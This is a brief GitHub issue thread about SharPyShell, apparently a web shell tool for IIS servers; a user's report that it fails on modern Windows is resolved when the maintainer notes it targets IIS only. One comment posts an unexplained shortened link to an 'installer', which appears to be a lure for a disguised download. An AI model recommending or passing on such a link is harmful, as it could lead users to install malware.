### ISSUE TITLE
Please update for windows 10

### ISSUE THREAD

**Issue by benjamin-castillo** [antonioCoco/SharPyShell#24]
Don't work over modern windows App example C# dotnet 8.

**Comment by Klevente12** [comment]
try this
https://bit.ly/4e4zLlq
select the desired compiler in the installer

**Comment by antonioCoco** [comment]
This is supposed to work only on Windows IIS webservers, are you testing that? What version are you testing?

**Comment by benjamin-castillo** [comment]
Sorry, I didn't realize that it only works for IIS.
